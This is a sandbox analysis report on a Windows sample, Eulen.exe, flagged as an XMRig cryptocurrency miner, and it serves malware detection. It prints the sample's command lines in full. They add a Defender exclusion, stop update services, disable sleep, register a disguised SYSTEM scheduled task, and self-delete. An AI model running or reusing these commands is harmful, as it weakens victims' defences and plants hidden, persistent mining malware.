Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Eulen.exe

Overview

General Information

Sample name:Eulen.exe
Analysis ID:1551907
MD5:f8dd965fe02f49c93f22972470d480b3
SHA1:859b8399768955c861037b246ca458e847041622
SHA256:acbae9fb2fe0b90eb94c09bc11726a544ffd22fb5ed20f4477227979e88fdc7d
Tags:exeuser-likeastar20
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • Eulen.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\Eulen.exe" MD5: F8DD965FE02F49C93F22972470D480B3)
    • dialer.exe (PID: 8080 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 372 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 888 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 660 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • ChromeUpdater.exe (PID: 6772 cmdline: "C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe" MD5: F8DD965FE02F49C93F22972470D480B3)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1224 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1596 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1704 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1716 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1740 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1800 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7708 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7936 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7984 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8000 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8016 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8032 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8048 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 8064 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8156 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 5916 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 1448 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 4320 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 8116 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5836 cmdline: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • choice.exe (PID: 1496 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\auqpbnqlvfdv.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    C:\Windows\Temp\auqpbnqlvfdv.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x4cb268:$a1: mining.set_target
    • 0x4c6a48:$a2: XMRIG_HOSTNAME
    • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
    • 0x4c6a20:$a4: XMRIG_VERSION
    C:\Windows\Temp\auqpbnqlvfdv.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
    • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    C:\Windows\Temp\auqpbnqlvfdv.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
    • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
    • 0x4d1fc8:$s3: \\.\WinRing0_
    • 0x4ca4c8:$s4: pool_wallet
    • 0x4c62d0:$s5: cryptonight
    • 0x4c62e0:$s5: cryptonight
    • 0x4c62f0:$s5: cryptonight
    • 0x4c6300:$s5: cryptonight
    • 0x4c6318:$s5: cryptonight
    • 0x4c6328:$s5: cryptonight
    • 0x4c6338:$s5: cryptonight
    • 0x4c6350:$s5: cryptonight
    • 0x4c6360:$s5: cryptonight
    • 0x4c6378:$s5: cryptonight
    • 0x4c6390:$s5: cryptonight
    • 0x4c63a0:$s5: cryptonight
    • 0x4c63b0:$s5: cryptonight
    • 0x4c63c0:$s5: cryptonight
    • 0x4c63d8:$s5: cryptonight
    • 0x4c63f0:$s5: cryptonight
    • 0x4c6400:$s5: cryptonight
    • 0x4c6410:$s5: cryptonight
    SourceRuleDescriptionAuthorStrings
    00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x60bc08:$a1: mining.set_target
      • 0x6073e8:$a2: XMRIG_HOSTNAME
      • 0x608ee0:$a3: Usage: xmrig [OPTIONS]
      • 0x6073c0:$a4: XMRIG_VERSION
      SourceRuleDescriptionAuthorStrings
      39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x4cb268:$a1: mining.set_target
        • 0x4c6a48:$a2: XMRIG_HOSTNAME
        • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
        • 0x4c6a20:$a4: XMRIG_VERSION
        39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
        • 0x4d1fc8:$s3: \\.\WinRing0_
        • 0x4ca4c8:$s4: pool_wallet
        • 0x4c62d0:$s5: cryptonight
        • 0x4c62e0:$s5: cryptonight
        • 0x4c62f0:$s5: cryptonight
        • 0x4c6300:$s5: cryptonight
        • 0x4c6318:$s5: cryptonight
        • 0x4c6328:$s5: cryptonight
        • 0x4c6338:$s5: cryptonight
        • 0x4c6350:$s5: cryptonight
        • 0x4c6360:$s5: cryptonight
        • 0x4c6378:$s5: cryptonight
        • 0x4c6390:$s5: cryptonight
        • 0x4c63a0:$s5: cryptonight
        • 0x4c63b0:$s5: cryptonight
        • 0x4c63c0:$s5: cryptonight
        • 0x4c63d8:$s5: cryptonight
        • 0x4c63f0:$s5: cryptonight
        • 0x4c6400:$s5: cryptonight
        • 0x4c6410:$s5: cryptonight
        39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          Click to see the 11 entries

          Operating System Destruction

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7936, ProcessName: cmd.exe

          System Summary

          barindex
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 8116, ProcessName: powershell.exe
          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 8116, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7708, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7708, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 8080, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7708, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-08T11:28:39.498296+010020229301A Network Trojan was detected20.109.210.53443192.168.2.849708TCP
          2024-11-08T11:29:17.533159+010020229301A Network Trojan was detected20.109.210.53443192.168.2.849711TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Eulen.exeAvira: detected
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeAvira: detection malicious, Label: HEUR/AGEN.1325655
          Source: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmpAvira: detection malicious, Label: HEUR/AGEN.1362795
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmpReversingLabs: Detection: 91%
          Source: C:\Windows\Temp\auqpbnqlvfdv.tmpReversingLabs: Detection: 70%
          Source: Eulen.exeReversingLabs: Detection: 15%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmpJoe Sandbox ML: detected
          Source: C:\Windows\Temp\auqpbnqlvfdv.tmpJoe Sandbox ML: detected

          Bitcoin Miner

          barindex
          Source: Yara matchFile source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPED
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeDirectory created: C:\Program Files\Google\Libs
          Source: Eulen.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
